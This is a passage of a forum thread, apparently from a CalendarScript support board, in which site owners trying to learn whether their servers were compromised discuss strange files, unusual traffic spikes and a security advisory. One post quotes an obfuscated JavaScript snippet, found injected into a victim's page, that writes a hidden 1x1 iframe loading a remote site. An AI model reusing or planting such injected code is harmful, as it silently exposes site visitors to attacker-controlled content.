Please contact Matt (CalendarScript's author) directly via email with as much details as you can. His email address is: matt@calendarscript.com
Dan O.
PS. Mention that you posted in this message in the forum too so he can keep others informed of any problems by replying here.
------------------
Thanks for the advice; I just forwarded my post directly to Matt.
In the meantime, do you think that doing a fresh, clean, brand-new install of 3.2.1 would be helpful (as opposed to the patch, which is what I did before)?
I doubt it would correct any problems that might be present (if CS is actually the cause of the problem).
I would further suggest you keep the files that are already in place until you hear from Matt. Either that or archive the whole lot first into a .zip or .tar.gz file just in case he would like to check them.
** calendarscript > config > unrealircd.conf **
BTW. "config" is not part of the CalendarScript installation. You might want to check the server logs to see who, how and when that directory was created.
PS. Matt might be interested in your server logs as well.
On our site we have had what seems to be an excess number of hits on the calendar.pl and the calendar_admin.pl
In checking the folders there is (1) an ssi.txt file in the Calendar Script folder, and (2) ssi.html files (times 3) in the templates/calendars/default, ..../oldstyle, and .../simple folders.
No raven, or cgi file. We are running 3.21
Suggestions?
Really??? That is a part of the normal CalendarScript distribution as is ssi.html in each of the template directories.
If you've been in direct contact with Matt, I suggest you check with him again as to what you're suppose to be looking for. I can't see how those files would be of interest in regard to hack attempts.
JMO
Are you allowing your calendar to be spidered by Google, Yahoo and MSN, etc.? Those could rack up a hit for each and every date on every month on the calendar and they often will spider a site several times a day.
Did you look up exactly what IP address(es) are responsible for the excess number of hits?
BTW. A hack because of CalendarScript would not AFAIK show any excessive usage of either those files. They would usually only be accessed once (maybe twice) to upload parasitic files to your server. From then on it would be those parasite files doing the work, not CalendarScript or its files.
http://securitytracker.com/alerts/2005/Apr/1013705.html
CalendarScript Discloses Installation Path and Debug Information to Remote Users and Permits Cross-Site Scripting Attacks SecurityTracker Alert ID: 1013705 SecurityTracker URL: http://securitytracker.com/id?1013705 Date: Apr 14 2005 Impact: Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information Exploit Included: Yes Version(s): 3.20, 3.21 Description: sNKenjoi reported several vulnerabilities in CalendarScript. A remote user can determine the installation path. A remote user can conduct cross-site scripting attacks. A remote user can also view debug information.
Just displaying path information is not a "problem".
this is a message i recieved from my server company who looked into a problem
on one of my web sites this code was added to the index page
<script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%67%61%6d%65%34%61%6c%6c%2e%62%69%7a%2f%61%64% 76%2f%31%37%38%2f%6e%65%77%2e%70%68%70%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%3b'));</script>
anyone have any idea what this is?
Do you? You really should have that looked into.
This forum however isn't the place to discuss it... unless you have CalendarScript installed on your server and it is responsible. IF it is, upgrade it!
** this code was added to the index page... anyone have any idea what this is? **
Unescape the string and see. It's code to launch an iframe within your page, which calls another web site.
game4all.com is same site i found email address (to a paypal link) and have written to the guy
my traffic tripled on one day.. my pageviews went from 2000 a day to 22000 (that's not an extra zero)..
This past month calendar.pl has gotten 680 visits (normal) and 41000 hits (normal is 8000).. so something is definitely up..
Most of my hits come from the following IPs:64.127.124.147 (30520 hits this month)152.99.75.130 (10806 hits this month)
I verified that I am running 3.21 .. I searched through the calendarscript folder and found nothing I saw as new.. Does anyone have any suggestions as to what to look for?
I searched filenames for the string "irc".. found nothing..
This very much concerns me..
-Jay
Maybe... but even if so, would have nothing to do with whether CalendarScript is a security risk (which BTW only allows other scripts to be uploaded to the server and has nothing to do with how much CalendarScript is called or runs on your server).
** Most of my hits come from the following IPs... **
Have to checked your access logs to see if you can find a referral for how they're getting there.
152.99.75.130 belongs to the Asia Pacific Network Information Centre. If your web site has no visitors from that part of the world, you could probably ban all access from any of their IP addresses from your server.
Everything ElseGeneral Use (Moderators: scott, DanO, Marty)Calendarscript can be hacked by outsiders?
